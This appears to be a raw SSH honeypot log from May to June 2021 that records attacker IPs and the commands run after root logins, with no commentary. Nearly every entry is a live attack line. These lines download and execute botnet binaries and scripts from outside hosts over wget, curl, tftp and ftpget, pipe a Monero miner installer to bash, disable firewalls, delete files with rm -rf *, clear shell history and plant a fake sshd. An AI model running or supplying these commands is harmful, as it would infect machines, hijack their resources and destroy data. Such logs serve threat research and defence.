history
ps aux
curl
exit

From 167.99.131.69 22-May-2021 10:23:09 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 119.29.152.108 23-May-2021 06:27:44 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://152.136.21.229/ug.txt;perl ug.txt*;wget http://152.136.21.229/serv.tar.gz;tar xf serv.tar.gz;cd serv;mv xmrig server;./server
  
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://152.136.21.229/ug.txt
perl ug.txt*
wget http://152.136.21.229/serv.tar.gz
tar xf serv.tar.gz
cd serv
mv xmrig server
./server

From 158.51.127.121 23-May-2021 07:33:14 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://158.51.127.62/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86 ; chmod 777 infn.x86 ; ./infn.x86 roots
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://158.51.127.62/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86
chmod 777 infn.x86
./infn.x86 roots

From 203.26.81.34 24-May-2021 02:41:00 ssh2 root
ps uax
curl
bash
exit

From 85.203.45.90 24-May-2021 17:04:53 ssh2 root
ls
history
curl
ls

From 220.167.103.107 26-May-2021 06:46:32 ssh2 root
ls
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
yum install curl
apt install curl
apt install curl install curl curlcom/xmrig_setup/raw/master/setup_c3pool_miner.sh install curl install curl curlcom/xmrig_setup/raw/master/setup_c3pool_miner.sh curl install curl curlcom/xmrig_setup/raw/master/setup_c3pool_miner.sh
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 209.141.53.114 26-May-2021 23:28:27 ssh2 root
Exec apt update -y; apt install curl -y; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
apt update -y
apt install curl -y
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
timeout 10 top

From 121.5.135.64 29-May-2021 00:47:45 ssh2 root
Exec echo -n Bfhj9kYo|md5sum
echo -n Bfhj9kYo|md5sum

From 157.230.51.227 29-May-2021 09:57:58 ssh2 root
Exec echo -n XHuMGCe5|md5sum
echo -n XHuMGCe5|md5sum

From 209.141.58.203 30-May-2021 03:44:04 ssh2 root

Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.88.121.177/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 23.88.121.177 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 23.88.121.177; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.88.121.177 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.88.121.177/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 23.88.121.177 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 23.88.121.177
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 23.88.121.177 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 209.141.58.203 30-May-2021 05:21:25 ssh2 root

Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sh
curl -O http://209.141.43.118/sh
chmod 777 sh
sh sh
tftp 209.141.43.118 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 209.141.43.118
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf

From 209.141.58.203 30-May-2021 15:12:49 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sh
curl -O http://209.141.43.118/sh
chmod 777 sh
sh sh
tftp 209.141.43.118 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 209.141.43.118
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 213.74.22.134 2-Jun-2021 02:40:04 ssh2 root
Exec cat /etc/issue
cat /etc/issue
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 5.15.10.52 2-Jun-2021 07:50:20 ssh2 root
top
?
w
uname -a
ps ax
history
ls -all
wget
curl
last
kill -9 -1
exit

From 198.23.172.240 2-Jun-2021 08:26:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.172.240/100UP.sh; curl -O http://198.23.172.240/100UP.sh; chmod 777 100UP.sh; sh 100UP.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.172.240/100UP.sh
curl -O http://198.23.172.240/100UP.sh
chmod 777 100UP.sh
sh 100UP.sh
rm -rf *

From 209.141.58.203 4-Jun-2021 00:56:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/8UsA.sh; curl -O http://209.141.43.118/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 209.141.43.118 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 209.141.43.118; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/8UsA.sh
curl -O http://209.141.43.118/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 209.141.43.118 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 209.141.43.118
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.58.203 4-Jun-2021 08:30:59 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sensi.sh; curl -O http://209.141.43.118/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.43.118 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.43.118; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sensi.sh
curl -O http://209.141.43.118/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.43.118 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.43.118
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 146.255.75.70 6-Jun-2021 03:43:32 ssh2 root
ls
ps x
lscpu
uname -0a
uname -a
cd /home
ls
exit

From 185.36.81.246 6-Jun-2021 09:28:46 ssh2 root
Exec cat /etc/issue; wget http://45.10.24.18/x86_64; chmod 777 x86_64; ./x86_64 skids
cat /etc/issue
wget http://45.10.24.18/x86_64
chmod 777 x86_64
./x86_64 skids

From 213.74.22.134 6-Jun-2021 09:53:54 ssh2 root
Exec cd /tmp;rm -rf ur0a.x86_64;wget http://107.172.156.158/Ryuk/ur0a.x86_64;chmod +x ur0a.x86_64;./ur0a.x86_64 x86_64;rm -rf ur0a.x86_64;curl -O http://107.172.156.158/Ryuk/ur0a.x86_64;chmod +x ur0a.x86_64;./ur0a.x86_64 x86_64;rm -rf ur0a.x86_64;busybox wget http://107.172.156.158/Ryuk/ur0a.x86_64;chmod +x ur0a.x86_64;./ur0a.x86_64 x86_64;rm -rf ur0a.x86_64
cd /tmp
rm -rf ur0a.x86_64
wget http://107.172.156.158/Ryuk/ur0a.x86_64
chmod +x ur0a.x86_64
./ur0a.x86_64 x86_64
rm -rf ur0a.x86_64
curl -O http://107.172.156.158/Ryuk/ur0a.x86_64
chmod +x ur0a.x86_64
./ur0a.x86_64 x86_64
rm -rf ur0a.x86_64
busybox wget http://107.172.156.158/Ryuk/ur0a.x86_64
chmod +x ur0a.x86_64
./ur0a.x86_64 x86_64
rm -rf ur0a.x86_64

From 106.54.187.30 7-Jun-2021 03:26:20 ssh2 root
Exec echo -n pQ8tbAEg|md5sum
echo -n pQ8tbAEg|md5sum

From 187.188.190.48 7-Jun-2021 09:22:52 ssh2 root
Exec echo -n YLXBEEfg|md5sum
echo -n YLXBEEfg|md5sum

From 178.138.96.60 7-Jun-2021 09:43:19 ssh2 root
w
lscpu
wget http://130.0.164.120/scan.jpg
curl
wget --no-check-certificate http://130.0.164.120/scan.jpg
wget -q -O http://130.0.164.120/scan.jpg

From 178.138.96.60 7-Jun-2021 09:46:10 ssh2 root
sftp
scp
lwp
lwp-download
uname -a
id richard
w
last
lastlog
halt

From 49.232.4.253 7-Jun-2021 16:54:23 ssh2 root
Exec echo -n H61bYOlu|md5sum
echo -n H61bYOlu|md5sum

From 178.138.96.60 7-Jun-2021 20:59:31 ssh2 root
w
lscpu
ping
halt

From 209.141.58.203 8-Jun-2021 12:52:26 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.42.231/sensi.sh; curl -O http://209.141.42.231/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.42.231 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.42.231; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.42.231 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.42.231/sensi.sh
curl -O http://209.141.42.231/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.42.231 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.42.231
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.42.231 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.58.203 8-Jun-2021 21:13:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sh
curl -O http://209.141.43.118/sh
chmod 777 sh
sh sh
tftp 209.141.43.118 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 209.141.43.118
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 81.68.67.193 9-Jun-2021 07:01:45 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 195.133.40.22 9-Jun-2021 11:09:35 ssh2 root
Exec wget cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://190.123.45.34/ultraesgrima.sh; chmod 777 ultraesgrima.sh; sh ultraesgrima.sh;rm -rf *
wget cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://190.123.45.34/ultraesgrima.sh
chmod 777 ultraesgrima.sh
sh ultraesgrima.sh
rm -rf *

From 41.242.56.81 10-Jun-2021 01:21:28 ssh2 root
Exec echo -n s0wzgajg|md5sum
echo -n s0wzgajg|md5sum

From 123.96.143.29 11-Jun-2021 18:39:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.212.32.99:1234/em;chmod 777 em;./em;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.212.32.99:1234/em
chmod 777 em
./em

From 203.159.80.97 11-Jun-2021 23:45:03 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://31.210.20.48/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://31.210.20.48/dirdir000/0s1s12.x86
cat 0s1s12.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 209.141.58.203 12-Jun-2021 11:32:18 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.58.203 12-Jun-2021 12:07:12 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.48.24 12-Jun-2021 15:32:21 ssh2 root
Exec cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 x86hxed; echo firewalla1337 & Anarchy were here
cat /etc/issue
cd /tmp
rm -rf x86_64
wget http://45.14.149.244/x86_64
chmod 777 x86_64
./x86_64 x86hxed
echo firewalla1337
Anarchy were here

From 157.230.227.135 12-Jun-2021 23:49:01 ssh2 root
Exec echo -n ngXCfxY9|md5sum
echo -n ngXCfxY9|md5sum

From 205.185.127.240 13-Jun-2021 01:17:39 ssh2 root
Exec cat /etc/issue; wget http://209.141.41.222/bins/jew.x86; chmod 777 jew.x86; ./jew.x86 root; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
wget http://209.141.41.222/bins/jew.x86
chmod 777 jew.x86
./jew.x86 root
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
echo firewalla1337 was here

From 62.171.156.18 14-Jun-2021 01:49:21 ssh2 root
Exec uname -a;nproc;wget https://gsmboss.clan.su/zn.jpg;perl zn.jpg;rm -rf zn*;history -c
uname -a
nproc
wget https://gsmboss.clan.su/zn.jpg
perl zn.jpg
rm -rf zn*
history -c

From 209.141.58.203 17-Jun-2021 01:25:15 ssh2 root
Exec uname -a
uname -a
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.48.24 17-Jun-2021 11:35:37 ssh2 root
Exec cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 x86hxed; echo firewalla1337 & Anarchy were here
cat /etc/issue
cd /tmp
rm -rf x86_64
wget http://45.14.149.244/x86_64
chmod 777 x86_64
./x86_64 x86hxed
echo firewalla1337
Anarchy were here

From 209.141.43.233 17-Jun-2021 23:49:41 ssh2 root
Exec cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 test; echo firewalla1337 and Anarchy were here
cat /etc/issue
cd /tmp
rm -rf x86_64
wget http://45.14.149.244/x86_64
chmod 777 x86_64
./x86_64 test
echo firewalla1337 and Anarchy were here

From 209.141.48.24 18-Jun-2021 11:09:49 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 136.144.41.169 18-Jun-2021 13:22:46 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://136.144.41.168/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://136.144.41.168/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86
cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 209.141.43.233 19-Jun-2021 15:09:31 ssh2 root
Exec cat /etc/issue; lscpu | grep 'Model name'; yum update -y; apt update -y; yum install curl -y; apt install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
cat /etc/issue
lscpu | grep 'Model name'
yum update -y
apt update -y
yum install curl -y
apt install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX

From 209.141.43.233 19-Jun-2021 15:36:23 ssh2 root
Exec cat /etc/issue; lscpu | grep 'Model name'; yum update -y; apt update -y; yum install curl -y; apt install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
cat /etc/issue
lscpu | grep 'Model name'
yum update -y
apt update -y
yum install curl -y

From 5.2.69.50 19-Jun-2021 15:36:25 ssh2 root
apt install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX

From 209.141.58.203 20-Jun-2021 18:02:59 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.58.203/ssh2 || curl -o ssh2 209.141.58.203/ssh2; tar xvf ssh2; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh2 || curl -o ssh2 209.141.58.203/ssh2
tar xvf ssh2
cd .ssh
chmod +x *
./sshd
./krane 1

From 188.166.11.150 20-Jun-2021 20:55:16 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.58.203 20-Jun-2021 22:25:57 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.58.203 20-Jun-2021 22:33:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 103.151.5.177 21-Jun-2021 03:18:49 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 157.230.87.222 22-Jun-2021 19:58:57 ssh2 root
Exec cd /tmp  cd /run  cd /; wget http://194.33.45.197:8080/chernobyl/chernobyl.sh; chmod 777 chernobyl.sh; sh chernobyl.sh chernobyl; tftp 194.33.45.197 -c get chernobyltftp1.sh; chmod 777 chernobyltftp1.sh; sh chernobyltftp1.sh chernobyl; tftp -r chernobyltftp2.sh -g 194.33.45.197; chmod 777 chernobyltftp2.sh; sh chernobyltftp2.sh chernobyl; rm -rf chernobyl.sh chernobyltftp1.sh chernobyltftp2.sh; rm -rf *;history -c
cd /tmp cd /run cd /
wget http://194.33.45.197:8080/chernobyl/chernobyl.sh
chmod 777 chernobyl.sh
sh chernobyl.sh chernobyl
tftp 194.33.45.197 -c get chernobyltftp1.sh
chmod 777 chernobyltftp1.sh
sh chernobyltftp1.sh chernobyl
tftp -r chernobyltftp2.sh -g 194.33.45.197
chmod 777 chernobyltftp2.sh
sh chernobyltftp2.sh chernobyl
rm -rf chernobyl.sh chernobyltftp1.sh chernobyltftp2.sh
rm -rf *
history -c

From 209.141.58.203 23-Jun-2021 03:23:21 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.58.203/ssh1 || curl -o ssh1 209.141.58.203/ssh1; tar xvf ssh1; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh1 || curl -o ssh1 209.141.58.203/ssh1
tar xvf ssh1
cd .ssh
chmod +x *
./sshd
./krane 1

From 154.221.20.50 24-Jun-2021 10:33:21 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget  http://152.136.21.229/ug.txt;perl ug.txt*;wget http://152.136.21.229/serv.tar.gz;tar xf serv.tar.gz;cd serv;mv xmrig server;./server

nproc
uname -a
cd /tmp
rm -rf serv*
wget http://152.136.21.229/ug.txt
perl ug.txt*
wget http://152.136.21.229/serv.tar.gz
tar xf serv.tar.gz
cd serv
mv xmrig server
./server

From 136.144.41.169 25-Jun-2021 23:33:23 ssh2 root
